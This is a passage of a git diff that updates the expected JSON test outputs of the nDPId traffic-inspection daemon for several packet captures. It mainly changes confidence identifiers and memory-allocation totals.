Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","packets-captured":258,"packets-processed":258,"total-skipped-flows":0,"total-l4-payload-len":18498,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1320435713237} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 258/258 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878929 bytes -~~ total memory freed........: 5878929 bytes -~~ total allocations/frees...: 118376/118376 +~~ total memory allocated....: 6012563 bytes +~~ total memory freed........: 6012563 bytes +~~ total allocations/frees...: 121138/121138 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1102 chars diff --git a/test/results/ssl-cert-name-mismatch.pcap.out b/test/results/ssl-cert-name-mismatch.pcap.out index f5f301c73..af1c0176b 100644 --- a/test/results/ssl-cert-name-mismatch.pcap.out +++ b/test/results/ssl-cert-name-mismatch.pcap.out @@ -4,10 +4,10 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620643422034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422034,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA8gCNAAEAGNQ\/AqALeaJpZadX0AbtP8LY3AAAAAKACchCFuAAAAgQFtAQCCAoBlw8kAAAAAAEDAwc="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620643422162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422162,"pkt":"ACWQ1Mz5BBjWBrNaCABFAAA8AABAADAGxTJomllpwKgC3gG71fRoLFRgT\/C2OKASbgBjmAAAAgQFjAQCCAqtfZhXAZcPJAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620643422162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620643422162,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA0gCRAAEAGNRbAqALeaJpZadX0AbtP8LY4aCxUYYAQAOWFsAAAAQEICgGXD0StfZhX"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} -00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} +00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":21,"total-skipped-flows":0,"total-l4-payload-len":4010,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1620643422754} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 21/21 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878260 bytes -~~ total memory freed........: 5878260 bytes -~~ total allocations/frees...: 118143/118143 +~~ total memory allocated....: 6011894 bytes +~~ total memory freed........: 6011894 bytes +~~ total allocations/frees...: 120905/120905 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 478 chars ~~ json string max len.......: 1212 chars diff --git a/test/results/starcraft_battle.pcap.out b/test/results/starcraft_battle.pcap.out index 043d305d6..4528ee41f 100644 --- a/test/results/starcraft_battle.pcap.out +++ b/test/results/starcraft_battle.pcap.out @@ -2,26 +2,26 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437389953643} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1437389953643,"pkt":"IImEa8W6hCYVPnXECABFAABHZtpAAPMGok\/AHvxbwKgBZAG7DI12Mx9qhBzaXVAYAB\/+XQAAFwMDABrSe+rfqh1HHm09zJFdvf5O5AwaBTHDWE16Zg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1437389953643,"pkt":"hCYVPnXEIImEa8W6CABFAABLZZBAAIAGFpbAqAFkwB78WwyNAbuEHNpddjMfiVAYAP4NnAAAFwMDAB4AAAAAAAAAE\/\/36Dj9UZVbiDpZWB\/\/4P+7KR1Y0OI="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437389953741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389953741,"pkt":"hCYVPnXEIImEa8W6CABFAABIX14AAIARVpTAqAFkwKgB\/uXCADUANEsbLmwBAAABAAAAAAAAAjkxAzI1MgIzMAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437389953742,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389953742,"pkt":"hCYVPnXEIImEa8W6CABFAABIX18AAIARVpPAqAFkwKgB\/uXCADUANO2f6I8BAAABAAAAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437389953743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1437389953743,"pkt":"IImEa8W6hCYVPnXECABFAABcAABAAEARtd7AqAH+wKgBZAA15cIASF7P6I+BgAABAAEAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAAAAAAgGbmItd2luAA=="} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437389953774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389953774,"pkt":"IImEa8W6hCYVPnXECABFAAAoZttAAPMGom3AHvxbwKgBZAG7DI12Mx+JhBzagFAQAB8ujQAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389954123,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389954123,"pkt":"IImEa8W6hCYVPnXECABFAAAohUoAAPMGdW9Q77oawKgBZAG7DZT7ZyHlrZYt91AU9s3jwgAAAAAAAAAA"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437389954543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2AAAIARVpLAqAFkwKgB\/uXPADUANOzD5FkBAAABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 